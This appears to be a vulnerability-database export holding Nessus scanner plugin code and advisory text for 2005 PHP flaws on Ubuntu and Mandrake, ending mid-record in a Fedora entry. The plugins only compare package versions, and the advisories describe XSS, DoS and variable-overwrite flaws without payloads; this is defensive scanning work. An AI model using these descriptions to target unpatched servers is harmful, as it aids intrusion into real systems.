script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache-mod-php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-universe-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-xslt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-cgi\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-curl\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-dev\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-domxml\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-gd\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-ldap\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mcal\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mhash\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mysql\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-odbc\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-pear\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-recode\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-snmp\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-sybase\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-xslt\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapache-mod-php4\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cgi\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cli\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-common\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-curl\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-dev\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-domxml\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-gd\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-imap\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-ldap\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mcal\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mhash\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mysql\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-odbc\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-pear\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-recode\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-snmp\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-sybase\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-universe-common\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-xslt\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache-mod-php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php-pear\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-cgi\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-cli\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-common\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-curl\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-dev\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-domxml\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-gd\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-ldap\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mcal\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mhash\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mysql\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-odbc\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-pear\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-pgsql\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-recode\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-snmp\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-sybase\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-xslt\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cgi\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cli\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-common\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-curl\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-dev\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-gd\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-ldap\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mhash\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mysql\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-odbc\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-pgsql\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-recode\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-snmp\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sqlite\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sybase\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xsl\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache-mod-php4 / libapache2-mod-php4 / libapache2-mod-php5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:30", "description": "A number of vulnerabilities were discovered in PHP :\n\nAn issue with fopen_wrappers.c would not properly restrict access to\nother directories when the open_basedir directive included a trailing\nslash (CVE-2005-3054); this issue does not affect Corporate Server\n2.1.\n\nAn issue with the apache2handler SAPI in mod_php could allow an\nattacker to cause a Denial of Service via the session.save_path option\nin an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue\ndoes not affect Corporate Server 2.1.\n\nA Denial of Service vulnerability was discovered in the way that PHP\nprocesses EXIF image data which could allow an attacker to cause PHP\nto crash by supplying carefully crafted EXIF image data\n(CVE-2005-3353).\n\nA cross-site scripting vulnerability was discovered in the phpinfo()\nfunction which could allow for the injection of JavaScript or HTML\ncontent onto a page displaying phpinfo() output, or to steal data such\nas cookies (CVE-2005-3388).\n\nA flaw in the parse_str() function could allow for the enabling of\nregister_globals, even if it was disabled in the PHP configuration\nfile (CVE-2005-3389).\n\nA vulnerability in the way that PHP registers global variables during\na file upload request could allow a remote attacker to overwrite the\n$GLOBALS array which could potentially lead the execution of arbitrary\nPHP commands. This vulnerability only affects systems with\nregister_globals enabled (CVE-2005-3390).\n\nThe updated packages have been patched to address this issue. Once the\nnew packages have been installed, you will need to restart your Apache\nserver using 'service httpd restart' in order for the new packages to\ntake effect ('service httpd2-naat restart' for MNF2).", "edition": 25, "published": "2006-01-15T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2005:213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:lib64php_common432", "p-cpe:/a:mandriva:linux:php-cgi", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php432-devel", "p-cpe:/a:mandriva:linux:php-cli", "cpe:/o:mandriva:linux:2006", "p-cpe:/a:mandriva:linux:libphp5_common5", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:libphp_common432"], "id": "MANDRAKE_MDKSA-2005-213.NASL", "href": "https://www.tenable.com/plugins/nessus/20445", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:213. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20445);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-2491\", \"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_xref(name:\"MDKSA\", value:\"2005:213\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2005:213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities were discovered in PHP :\n\nAn issue with fopen_wrappers.c would not properly restrict access to\nother directories when the open_basedir directive included a trailing\nslash (CVE-2005-3054); this issue does not affect Corporate Server\n2.1.\n\nAn issue with the apache2handler SAPI in mod_php could allow an\nattacker to cause a Denial of Service via the session.save_path option\nin an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue\ndoes not affect Corporate Server 2.1.\n\nA Denial of Service vulnerability was discovered in the way that PHP\nprocesses EXIF image data which could allow an attacker to cause PHP\nto crash by supplying carefully crafted EXIF image data\n(CVE-2005-3353).\n\nA cross-site scripting vulnerability was discovered in the phpinfo()\nfunction which could allow for the injection of JavaScript or HTML\ncontent onto a page displaying phpinfo() output, or to steal data such\nas cookies (CVE-2005-3388).\n\nA flaw in the parse_str() function could allow for the enabling of\nregister_globals, even if it was disabled in the PHP configuration\nfile (CVE-2005-3389).\n\nA vulnerability in the way that PHP registers global variables during\na file upload request could allow a remote attacker to overwrite the\n$GLOBALS array which could potentially lead the execution of arbitrary\nPHP commands. This vulnerability only affects systems with\nregister_globals enabled (CVE-2005-3390).\n\nThe updated packages have been patched to address this issue. Once the\nnew packages have been installed, you will need to restart your Apache\nserver using 'service httpd restart' in order for the new packages to\ntake effect ('service httpd2-naat restart' for MNF2).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_182005.77.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_192005.78.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_202005.79.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php432-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64php_common432-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libphp_common432-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php-cgi-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php-cli-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php432-devel-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64php_common432-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libphp_common432-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cgi-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cli-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php432-devel-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libphp5_common5-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cgi-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cli-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-devel-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-exif-5.0.4-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-fcgi-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T06:32:01", "description": "updates the mozilla certificate list, removes expired certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 4, "cvss3": {}, "published": "2020-06-23T00:00:00", "title": "Fedora 32 : ca-certificates (2020-fb144e7de5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388"], "modified": "2020-06-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:ca-certificates"], "id": "FEDORA_2020-FB144E7DE5.NASL", "href": "https://www.tenable.com/plugins/nessus/137737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-fb144e7de5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137737);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", 